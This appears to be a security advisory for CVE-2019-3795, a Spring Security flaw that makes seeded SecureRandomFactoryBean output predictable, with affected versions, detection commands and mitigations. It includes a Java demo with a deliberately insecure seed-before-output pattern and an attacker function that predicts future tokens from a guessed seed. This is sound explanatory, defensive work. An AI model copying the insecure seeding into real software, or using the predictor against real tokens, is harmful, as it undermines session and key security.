Platform
java
Component
spring-security
Fixed in
4.2.12.RELEASE
5.0.12.RELEASE
5.1.5.RELEASE
CVE-2019-3795 describes an insecure randomness vulnerability in Spring Security. An attacker can potentially predict the random numbers generated by an application if the application supplies a seed to SecureRandomFactoryBean and exposes the resulting random material. The vulnerability affects Spring Security 4.2.x prior to 4.2.12, 5.0.x prior to 5.0.12, and 5.1.x prior to 5.1.5; it is fixed in 4.2.12.RELEASE, 5.0.12.RELEASE and 5.1.5.RELEASE.
The core of this vulnerability lies in the SecureRandomFactoryBean component of Spring Security, which builds a java.security.SecureRandom (SHA1PRNG by default) and, when a seed is configured, applies it with setSeed. For SHA1PRNG, calling setSeed before the generator has produced any output replaces the provider's own self-seeding entirely, so every byte the instance later emits is a deterministic function of the configured seed. An attacker who can guess or obtain the seed can therefore reproduce the whole stream, and any exposed random material (a token, a nonce, a session identifier) lets them confirm the guess and predict the values that follow. This can compromise security-sensitive operations that rely on unpredictable output, such as generating session IDs, cryptographic keys, or nonces. The issue was rated LOW because two conditions must hold (a seed is supplied, and the output is observable), but the impact on an application that meets both, particularly one whose seed is predictable or derived from easily obtainable information, can be significant. The vulnerability does not allow code execution; it weakens the security posture by undermining the randomness that other protections are built on.
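The following added example (not code from the Spring Security project or from this page) reproduces the mechanism directly against java.security.SecureRandom, so that it runs without Spring on the classpath. It assumes the SHA1PRNG algorithm, which is SecureRandomFactoryBean's default, and uses a constructed, hypothetical seed string. The "vulnerable" path seeds before any output has been drawn, as the affected releases did; the "fixed" path first draws one byte to force self-seeding and only then supplements the state with the seed, which is the ordering the fixed releases apply. A hypothetical attacker function shows what "predict future random numbers" means in practice: given a guessed seed and the bytes an application exposed, it reproduces the stream and returns the bytes the application will emit next.

```java
import java.nio.charset.StandardCharsets;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;
import java.util.Arrays;

public class SeededSecureRandomDemo {

    // Constructed example seed; a real deployment might load this from a file or property.
    static final byte[] SEED = "example-seed-value".getBytes(StandardCharsets.UTF_8);

    /** Pre-fix ordering: the seed is applied before the generator has produced anything,
     *  so for SHA1PRNG it replaces self-seeding and fully determines the output. */
    static SecureRandom seedBeforeOutput(byte[] seed) throws NoSuchAlgorithmException {
        SecureRandom rnd = SecureRandom.getInstance("SHA1PRNG");
        rnd.setSeed(seed);
        return rnd;
    }

    /** Fixed ordering: force self-seeding from the provider's entropy source first,
     *  then mix the configured seed into the existing state as a supplement. */
    static SecureRandom selfSeedThenSeed(byte[] seed) throws NoSuchAlgorithmException {
        SecureRandom rnd = SecureRandom.getInstance("SHA1PRNG");
        rnd.nextBytes(new byte[1]);
        rnd.setSeed(seed);
        return rnd;
    }

    static byte[] draw(SecureRandom rnd, int n) {
        byte[] out = new byte[n];
        rnd.nextBytes(out);
        return out;
    }

    /** Hypothetical attacker: replays a guessed seed against observed output. If the replayed
     *  stream matches what the application exposed, the next bytes are predictable; otherwise
     *  the guess was wrong (or the generator was self-seeded) and null is returned. */
    static byte[] predictNext(byte[] guessedSeed, byte[] observed, int n) throws NoSuchAlgorithmException {
        SecureRandom replay = seedBeforeOutput(guessedSeed);
        if (!Arrays.equals(draw(replay, observed.length), observed)) {
            return null;
        }
        return draw(replay, n);
    }

    static String hex(byte[] bytes) {
        StringBuilder sb = new StringBuilder(bytes.length * 2);
        for (byte b : bytes) sb.append(String.format("%02x", b));
        return sb.toString();
    }

    public static void main(String[] args) throws Exception {
        // 1. Two independently created instances, seeded the pre-fix way, emit identical bytes.
        SecureRandom app = seedBeforeOutput(SEED);
        byte[] exposedToken = draw(app, 16);   // imagine this is a token the application leaks
        byte[] nextToken = draw(app, 16);      // what the application hands out next
        byte[] predicted = predictNext(SEED, exposedToken, 16);
        System.out.println("seed-before-output, exposed : " + hex(exposedToken));
        System.out.println("seed-before-output, next    : " + hex(nextToken));
        System.out.println("attacker prediction         : " + (predicted == null ? "failed" : hex(predicted)));
        System.out.println("prediction correct          : " + Arrays.equals(nextToken, predicted));

        // 2. With self-seeding forced first, the same seed no longer determines the stream.
        SecureRandom fixedApp = selfSeedThenSeed(SEED);
        byte[] fixedExposed = draw(fixedApp, 16);
        byte[] fixedPrediction = predictNext(SEED, fixedExposed, 16);
        System.out.println("self-seed-then-seed, exposed: " + hex(fixedExposed));
        System.out.println("attacker prediction         : " + (fixedPrediction == null ? "failed" : hex(fixedPrediction)));
    }
}
```

Run it with `javac SeededSecureRandomDemo.java && java SeededSecureRandomDemo`. The first block prints "prediction correct : true" on every run, which is the observable symptom of the flaw: the seed alone reproduces the stream. The second block prints "failed", because the one-byte draw pulled entropy from the provider before the seed was mixed in. The same reasoning applies to the workaround in the mitigation section: on an unpatched release, a seed that is high-entropy and never leaves the host leaves the attacker with nothing to replay, but a seed derived from guessable input (a hostname, a timestamp, a fixed string) is effectively a password protecting every token the bean produces.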
CVE-2019-3795 was publicly disclosed on April 9, 2019. There is no indication of active exploitation campaigns targeting this vulnerability at this time. No public proof-of-concept (PoC) exploits have been widely reported. The vulnerability is not currently listed on the CISA KEV catalog. The LOW CVSS score reflects the relatively limited attack surface and the requirement for specific conditions to be met for exploitation.
Applications that rely on Spring Security for authentication and authorization and that generate cryptographic keys, tokens or session IDs from a seeded SecureRandomFactoryBean, then expose the resulting random data, are at increased risk. Systems running an unpatched version of Spring Security (4.2.x before 4.2.12, 5.0.x before 5.0.12, 5.1.x before 5.1.5) are directly vulnerable.
• java / server:
# List the Spring Security jars bundled in a Spring Boot fat jar; the version is part of the file name
unzip -l your_application.jar | grep 'spring-security-core'
• java / supply-chain:
# Check for vulnerable dependencies in a Maven project
mvn dependency:tree | grep 'spring-security'
# Gradle equivalent
gradle dependencies | grep 'spring-security'
• generic web:
# Check whether seed material is leaking into application logs
grep -i 'seed=' /var/log/your_application/*.log
Exploit status
EPSS
0.55% (percentile 68%)
CVSS vector
The primary mitigation for CVE-2019-3795 is to upgrade to a fixed release: 4.2.12.RELEASE, 5.0.12.RELEASE or 5.1.5.RELEASE, or later, according to the branch your project uses. If an immediate upgrade is not feasible, reduce exposure in the meantime. Review application code and configuration for every use of SecureRandomFactoryBean and check whether a seed is configured; if it is not, the bean is unaffected. Where a seed is configured, make sure it is drawn from a high-entropy source rather than from predictable or easily obtainable information, and keep it off any channel an attacker can read (logs, error pages, version control). Avoid exposing the random material generated by a seeded SecureRandomFactoryBean to external parties. These measures lower the likelihood of exploitation but are not a fix: only the upgrade restores self-seeding when a seed is supplied.
Update Spring Security to version 4.2.12.RELEASE, 5.0.12.RELEASE or 5.1.5.RELEASE, or a later version, whichever fits your project. This corrects the insecure randomness when using SecureRandom through SecureRandomFactoryBean.
CVE-2019-3795 is a vulnerability in Spring Security (4.2.x before 4.2.12, 5.0.x before 5.0.12, 5.1.x before 5.1.5) in which an attacker can predict random numbers when a seed is provided to SecureRandomFactoryBean and the resulting random material is exposed, potentially compromising security-sensitive operations.
You are affected if you are using Spring Security versions 4.2.x prior to 4.2.12, 5.0.x prior to 5.0.12, or 5.1.x prior to 5.1.5.
Upgrade to Spring Security 4.2.12.RELEASE, 5.0.12.RELEASE or 5.1.5.RELEASE, or later. Until then, ensure any configured seed is high-entropy and not guessable, and avoid exposing the random material.
There is no indication of active exploitation campaigns targeting this vulnerability at this time.
Reference: MITRE CVE entry for CVE-2019-3795: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3795